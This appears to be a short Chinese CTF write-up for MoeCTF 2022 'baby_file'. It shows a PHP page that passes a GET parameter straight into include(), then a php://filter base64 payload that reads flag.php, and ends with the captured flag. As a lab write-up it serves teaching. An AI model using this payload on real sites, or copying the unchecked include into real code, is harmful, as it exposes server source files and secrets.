技术栈

[MoeCTF 2022]baby_file

马船长2025-02-08 9:49

题目

复制代码
<html>
<title>Here's a secret. Can you find it?</title>
<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}
?>
</html>

读取flag

复制代码
/?file=php://filter/read=convert.base64-encode/resource=flag.php

使用bp解码

拿下flag

NSSCTF{00bb1bc4-f867-45af-b88b-02b18cd6725b};

上一篇:KAFKA-UI升级教程,因旧版本不支持(KAFKA-3.8.0 开启SASL认证)
下一篇:如何在Windows上使用Docker
相关推荐
peakmain9
6 分钟前
Gradle 8.11.1的升级之旅
前端
一拳不是超人
17 分钟前
PWA渐进式Web应用技术深度解析
前端·pwa
KaneLogger
19 分钟前
视频转文字,别再反复拖进度条了
前端·javascript·人工智能
前端风云志
32 分钟前
JavaScript中如何遍历对象?
javascript
zwjapple
7 小时前
docker-compose一键部署全栈项目。springboot后端,react前端
前端·spring boot·docker
像风一样自由2020
9 小时前
HTML与JavaScript:构建动态交互式Web页面的基石
前端·javascript·html
aiprtem
9 小时前
基于Flutter的web登录设计
前端·flutter
浪裡遊
10 小时前
React Hooks全面解析:从基础到高级的实用指南
开发语言·前端·javascript·react.js·node.js·ecmascript·php
why技术
10 小时前
Stack Overflow,轰然倒下!
前端·人工智能·后端
GISer_Jing
10 小时前
0704-0706上海,又聚上了
前端·新浪微博
热门推荐
01Java学习第十五部分——MyBatis02集群聊天服务器---MySQL数据库的建立03Coze扣子平台完整体验和实践(附国内和国际版对比)04基于odoo17的设计模式详解---装饰模式05使用Ruby接入实时行情API教程06扣子(coze)实战|我用扣子搭建了一个自动分析小红薯笔记内容的AI应用|详细步骤拆解07Everything文件检索工具 几秒检索几百G的文件08基于odoo17的设计模式详解---单例模式09DeepSeek各版本说明与优缺点分析10【无标题】